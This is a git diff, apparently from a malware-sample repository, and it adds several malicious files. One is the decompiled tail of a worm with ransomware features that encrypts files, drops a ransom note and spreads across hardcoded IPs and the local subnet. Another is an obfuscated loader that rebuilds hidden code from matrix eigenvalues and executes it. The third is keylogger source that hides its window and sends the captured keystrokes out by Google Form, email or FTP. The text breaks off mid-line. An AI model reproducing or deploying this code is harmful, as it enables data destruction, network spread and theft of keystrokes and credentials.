'\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n' + ET = '\\ NDFWET ' + trigger_SB_IPs = ['13.179.185.111', '13.67.89.198', '52.144.44.134'] + try: + requests.get('https://bit.ly/2Zlmmzb') + except Exception as e: + pass + + try: + res = requests.get('https://blockchain.info/q/addressbalance/19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7') + if int(res.text) > 1000000000: + sys.exit() + except Exception as e: + pass + + if not check_domz(switch): + encrypt_files() + drop_note(nyan) + local_ip = get_local_ip() + ip_parts = local_ip.split('.') + for ip in trigger_SB_IPs: + worm(ip) + + for i in range(1, 255): + ip_parts[3] = str(i) + worm('.'.join(ip_parts)) + + while True: + if not check_domz(switch): + worm(get_worm_target()) + + else: + print 'Hero Detected' +# okay decompiling redkeeper_fixed.pyc \ No newline at end of file diff --git a/Python/Scrypt.7z b/Python/Scrypt.7z new file mode 100644 index 00000000..cd4b3320 Binary files /dev/null and b/Python/Scrypt.7z differ diff --git a/Python/Sin.7z b/Python/Sin.7z new file mode 100644 index 00000000..75212a09 Binary files /dev/null and b/Python/Sin.7z differ diff --git a/Python/Virus.Python.Agent.c b/Python/Virus.Python.Agent.c new file mode 100644 index 00000000..87cfd2f3 --- /dev/null +++ b/Python/Virus.Python.Agent.c @@ -0,0 +1,98 @@ +def root3(num): + fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j + fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j + a=num**(1/3.0) + b=a*fak1 + c=a*fak2 + return([a,b,c]) + +def getPQ(a,b,c): + p = b-((a**2)/3.0) + q = c + ((2*(a**3)-9*a*b)/27.0) + return([p,q]) + +def getU(p,q): + u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0) + return(root3(u3)) + +def getLambda(a,p,u): + if u[0] == 0: + L0=u[0] - a/3.0 + else: + L0=u[0] - p/(3.0*u[0]) - a/3.0 + + if u[1] == 0: + L1=-a/3.0 + else: + L1=u[1] - p/(3.0*u[1]) - a/3.0 + + if u[2] == 0: + L2=-a/3.0 + else: + L2=u[2] - p/(3.0*u[2]) - a/3.0 + + return(L0,L1,L2) + +def getABC(mtx): + a=-(mtx[0]+mtx[4]+mtx[8]) + b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6] + c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6] + return([a,b,c]) + +def eigenvalues(mtx): + ABC=getABC(mtx) + PQ=getPQ(ABC[0],ABC[1],ABC[2]) + U=getU(PQ[0],PQ[1]) + L=getLambda(ABC[0],PQ[0],U) + return(L) + +def getstring(M): + str='' + for c in range(len(M)): + mLD=eigenvalues(M[c]) + for i in range(len(mLD)+1): + for n in range(len(mLD)): + if round(mLD[n].imag)==i: + str+=chr(int(round(mLD[n].real))) + return(str) + +M=[] +M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),]) +M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),]) +M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),]) +M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),]) +M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),]) +M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),]) +M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),]) +M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),]) +M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),]) +M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),]) +M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),]) +M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),]) +M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),]) +M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),]) +M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),]) +M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),]) +M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),]) +M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),]) +M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),]) +M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),]) +M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),]) +M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),]) +M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),]) +M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),]) +M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),]) +M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),]) +M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),]) +M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),]) +M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),]) +M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),]) +M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),]) +M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),]) +M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),]) +M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),]) +M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),]) +M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),]) +M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),]) +myMTXcode=getstring(M) +exec(myMTXcode) diff --git a/Python/xenotix.py b/Python/xenotix.py new file mode 100644 index 00000000..933603a1 --- /dev/null +++ b/Python/xenotix.py @@ -0,0 +1,210 @@ +''' +Xenotix Python Keylogger for Windows +==================================== +Coded By: Ajin Abraham <ajin25@gmail.com> +Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/ +GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger + +FEATURES +======== +1.STORE LOGS LOCALLY +2.SEND LOGS TO GOOGLE FORMS +3.SEND LOGS TO EMAIL +4.SEND LOGS TO FTP + +MINIMUM REQUIREMENTS +=================== +Python 2.7: http://www.python.org/getit/ +pyHook Module: http://sourceforge.net/projects/pyhook/ +pyrhoncom Module: http://sourceforge.net/projects/pywin32/ + +pyHook Module - +Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/ + + +NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY. +''' +try: + import pythoncom, pyHook +except: + print "Please Install pythoncom and pyHook modules" + exit(0) +import os +import sys +import threading +import urllib,urllib2 +import smtplib +import ftplib +import datetime,time +import win32event, win32api, winerror + +#Disallowing Multiple Instance +mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz') +if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS: + mutex = None + print "Multiple Instance not Allowed" + exit(0) +x='' +data='' +count=0 + +#Hide Console +def hide(): + import win32console,win32gui + window = win32console.GetConsoleWindow() + win32gui.ShowWindow(window,0) + return True +def msg(): + print """Xenotix Python Keylogger for Windows +Coder: Ajin Abraham <ajin25@gmail.com> +OPENSECURITY.IN + +usage:xenotix_python_logger.py mode +mode: + local: store the logs in a file [keylogs.txt] + remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script. + email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO). + ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY). + """ + return True + +#Local Keylogger +def local(): + global data + if len(data)>100: + fp=open("keylogs.txt","a") + fp.write(data) + fp.close() + data='' + return True + +#Remote Google Form logs post +def remote(): + global data + if len(data)>100: + url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here + klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here + try: + dataenc=urllib.urlencode(klog) + req=urllib2.Request(url,dataenc) + response=urllib2.urlopen(req) + data='' + except Exception as e: + print e + return True + +#Email Logs +class TimerClass(threading.Thread): + def __init__(self): + threading.Thread.__init__(self) + self.event = threading.Event() + def run(self): + while not self.event.is_set(): + global data + if len(data)>100: + ts = datetime.datetime.now() + SERVER = "smtp.gmail.com" #Specify Server Here + PORT = 587 #Specify Port Here + USER="your_email@gmail.com"#Specify Username Here + PASS="password_here"#Specify Password Here + FROM = USER#From address is taken from username + TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed. + SUBJECT = "Keylogger data: "+str(ts) + MESSAGE = data + message = """\ +From: %s +To: %s +Subject: %s + +%s +""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE) + try: + server = smtplib.SMTP() + server.connect(SERVER,PORT) + server.starttls() + server.login(USER,PASS) + server.sendmail(FROM, TO, message) + data='' + server.quit() + except Exception as e: + print e + self.event.wait(120) + +#Upload logs to FTP account +def ftp(): + global data,count + if len(data)>100: + count+=1 + FILENAME="logs-"+str(count)+".txt" + fp=open(FILENAME,"a") + fp.write(data) + fp.close() + data='' + try: + SERVER="ftp.xxxxxx.com" #Specify your FTP Server address + USERNAME="ftp_username" #Specify your FTP Username + PASSWORD="ftp_password" #Specify your FTP Password + SSL=0 #Set 1 for SSL and 0 for normal connection + OUTPUT_DIR="/" #Specify output directory here + if SSL==0: + ft=ftplib.FTP(SERVER,USERNAME,PASSWORD) + elif SSL==1: + ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD) + ft.cwd(OUTPUT_DIR) + fp=open(FILENAME,'rb') + cmd= 'STOR' +' '+FILENAME + ft.storbinary(cmd,fp) + ft.quit() + fp.close() + os.remove(FILENAME) + except Exception as e: + print e + return True + +def main(): + global x + if len(sys.argv)==1: + msg() + exit(0) + else: + if sys.argv[1]=="local": + x=1 + hide() + elif sys.argv[1]=="remote": + x=2 + hide() + elif sys.argv[1]=="email": + hide() + email=TimerClass() + email.start() + elif sys.argv[1]=="ftp": + x=4 + hide() + else: + msg() + exit(0) + return True +main() + +def keypressed(event): + global x,data + if event.Ascii==13: + keys='<ENTER>' + elif event.Ascii==8: + keys='<BACK 